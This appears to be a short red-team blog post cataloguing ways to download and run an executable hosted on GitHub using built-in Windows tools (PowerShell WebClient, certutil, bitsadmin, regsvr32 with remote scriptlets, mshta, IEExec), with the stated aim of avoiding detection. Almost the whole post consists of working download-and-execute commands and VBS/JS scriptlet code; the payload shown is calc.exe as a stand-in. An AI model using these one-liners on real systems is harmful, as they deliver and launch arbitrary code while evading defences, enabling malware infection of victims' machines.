Some ways to download files remotely from Github

Tips

Publish Date: 2021-07-23

Update Date: 2021-09-11

Word Count: 520

Read Times: 3 Min

Read Count:

Introduction

The goal is to improve the traceability cost, avoid being detected by the traceability, and improve the concealment

Existing documents:
https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe
You need to download to C:\test and execute

Actual use

powershell

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','C:\test\yang.exe');start-process 'C:\test\yang.exe'

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','c:\\test\\yang.exe');start-process 'c:\\test\\yang.exe'

certutil

certutil -urlcache -split -f https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe C:\test\yang.exe&&C:\test\yang.exe

bitsadmin

Slow, not recommended
bitsadmin /transfer n https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe C:\test\yang.exe && C:\test\yang.exe

regsvr32

Run the regsve32-vbs-download-exec

regsvr32 /s /i:https://github.com/YangSirrr/Yangsir-blog-img/raw/main/download.sct   scrobj.dll

Use this:
			Const adTypeBinary = 1
			Const adSaveCreateOverWrite = 2
			Dim http,ado
			Set http = CreateObject("Msxml2.ServerXMLHTTP.6.0")
			http.SetOption 2, 13056
			http.open "GET","https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe",False
			http.send
			Set ado = createobject("Adodb.Stream")
			ado.Type = adTypeBinary
			ado.Open
			ado.Write http.responseBody
			ado.SaveToFile "C:\test\yang.exe"
			ado.Close

Run the regsve32-JS-ps-download-exec

regsvr32 /u /s /i:https://github.com/YangSirrr/Yangsir-blog-img/raw/main/download.sct scrobj.dll

Use this:
new ActiveXObject("WScript.Shell").Run("powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','c:\\test\\yang.exe');start-process 'c:\\test\\yang.exe'",0,true);

mshta

Mshta supports http&https, where the script must be an HTML page to run, otherwise it will be parsed as text

The local environment is used as an example

mshta http://127.0.0.1/calc.hta

Make sure the download executes successfully to PowerShell

powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/YangSirrr/Yangsir-blog-img/raw/main/calc.exe','C:\test\yang.exe');start-process 'C:\test\yang.exe'

IEExec

Encountered pit point, not yet solved, later review

cd C:\Windows\Microsoft.NET\Framework\v2.0.50727\
caspol -s off
IEExec http://192.168.3.8/yang.exe

Yangsir

https://yangsirrr.github.io/2021/07/23/some-ways-to-download-files-remotely-from-github/

All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !

Redteam Bypass File download

Sqlserver common attack methods

2021-07-24 Tips

Redteam Command execution Information collection Sqlserver Database

Supplementary information about obtaining LDAP information

2021-07-23 Tips

Redteam Bypass Intranet Information Collection